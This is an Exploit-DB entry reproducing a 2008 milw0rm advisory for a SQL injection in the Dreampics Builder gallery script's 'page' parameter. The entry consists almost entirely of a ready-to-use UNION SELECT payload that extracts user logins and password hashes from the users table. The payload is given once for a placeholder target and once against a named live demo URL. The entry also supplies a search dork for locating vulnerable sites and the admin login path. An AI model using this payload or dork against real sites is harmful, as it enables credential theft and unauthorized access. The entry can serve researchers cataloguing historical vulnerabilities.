Dreampics Builder (page) Remote SQL Injection Vulnerability



EDB-ID: 6034 CVE: 2008-3119OSVDB-ID: 46877
Author: Hussin XPublished: 2008-07-09Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#########################################################
#
#     PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#                                                       =
#=========================================================
#
#    script :  http://www.dreamlevels.com/dreampics.php
#
#    DorK   :   powered by Dreampics Builder
#
##########################################################
Exploit:
www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
L!VE DEMO:
http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--
Admin Login :
/admin/
########################( Greetz )###########################
#                                                           #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
#                                                           #
#         Iraqihack / FAHD / mos_chori / Silic0n            #
#                                                           #
#############################################################
                       Im IRAQi
# milw0rm.com [2008-07-09]






Comments

No comments so far